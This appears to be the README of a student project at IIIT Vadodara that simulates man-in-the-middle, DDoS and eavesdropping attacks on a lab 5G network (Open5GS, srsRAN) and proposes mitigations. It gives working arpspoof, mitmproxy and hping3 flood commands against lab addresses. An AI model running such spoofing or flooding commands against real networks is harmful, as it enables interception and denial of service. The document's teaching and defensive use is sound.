Welcome to the 5G Security Threats Mini Project, part of the IIITV 5G and Edge Computing Activity. This project delves into critical security challenges in 5G networks, showcasing simulations of attacks and implementing basic mitigation solutions.
IIITV 5G and Edge Computing Activity is an open-source initiative by IIIT Vadodara to explore, innovate, and contribute to the domains of 5G technology and Edge Computing. It aims to foster a culture of collaboration and innovation while empowering students to engage with cutting-edge technologies.
- Aryan Amit Gupta (202151029)
- Parth Soni (202151104)
- Priyansh Vaishnav (202151120)
This project explores security challenges in 5G networks, focusing on:
- Man-in-the-Middle (MitM) Attacks
- Distributed Denial of Service (DDoS) Attacks
- Eavesdropping Threats
-
Threat Identification
Understanding the vulnerabilities and risks posed by the selected threats in 5G networks. -
Simulation of Attacks
Using Open5GS and srsRAN, the project simulates these attacks to study their impact on:- The Core Network.
- The Radio Access Network (RAN).
-
Implementation of Mitigation Solutions
Designing and implementing basic security solutions:- Encryption mechanisms for eavesdropping prevention.
- Intrusion Detection Systems (IDS) for DDoS prevention.
- Secure authentication for mitigating MitM attacks.
-
Deliverables
- A detailed analysis of threats.
- Simulations demonstrating the impact and behavior of attacks.
- Mitigation solutions with demonstrated effectiveness.
- A comprehensive project report summarizing findings and recommendations.
- OS: Ubuntu 20.04 or later
- Hardware: Minimum 8GB RAM and 50GB disk space
- Networking Tools: tcpdump, Wireshark, mitmproxy, hping3, and arpspoof
- Open5GS: A 5G Core Network implementation.
- srsRAN: A software suite for simulating the UE and gNB.
- tcpdump: Packet capture tool.
- Wireshark: Traffic analysis.
- mitmproxy: For intercepting and manipulating HTTP traffic.
- hping3: For generating DDoS attack traffic.
sudo apt update
sudo apt install software-properties-common
sudo add-apt-repository ppa:open5gs/latest
sudo apt update
sudo apt install open5gs
sudo add-apt-repository ppa:softwareradiosystems/srsran-project
sudo apt update
sudo apt install srsran-project -y
Intercept and manipulate communication between the UE and core network.
- Enable IP forwarding:
sudo sysctl -w net.ipv4.ip_forward=1
- Redirect traffic using ARP spoofing:
sudo arpspoof -i ogstun -t 10.45.0.2 10.45.0.1 sudo arpspoof -i ogstun -t 10.45.0.1 10.45.0.2
- Intercept HTTP traffic using mitmproxy:
mitmproxy -p 8080
Overload the UE or core network with traffic.
- Flood the UE with ICMP traffic:
sudo hping3 -1 -i u1000 10.45.0.2
- Flood the core network with UDP packets:
sudo hping3 -p 2152 --udp 10.45.0.1
Capture unencrypted traffic using tcpdump or Wireshark.
- Start packet capture:
sudo tcpdump -i ogstun -w capture.pcap
- Analyze packets using Wireshark:
wireshark capture.pcap
- Use TLS for securing HTTP traffic.
- Ensure end-to-end encryption between the UE and core network.
- Deploy an IDS (e.g., Suricata) to monitor and block suspicious traffic patterns.
- Implement mutual authentication with strong cryptographic mechanisms to prevent MitM.
-
Analysis of Threats
Detailed insights into the vulnerabilities exploited by MitM, DDoS, and Eavesdropping attacks. -
Simulated Scenarios
Demonstrated the impact of attacks on 5G network components. -
Mitigation Strategies
Designed and tested basic solutions to mitigate the identified threats.
We welcome contributions to enhance this project. Feel free to submit pull requests or report issues. Together, we can advance the understanding and security of 5G networks!
This project is licensed under the MIT License.
Special thanks to IIIT Vadodara for fostering a collaborative and innovative environment for exploring cutting-edge technologies.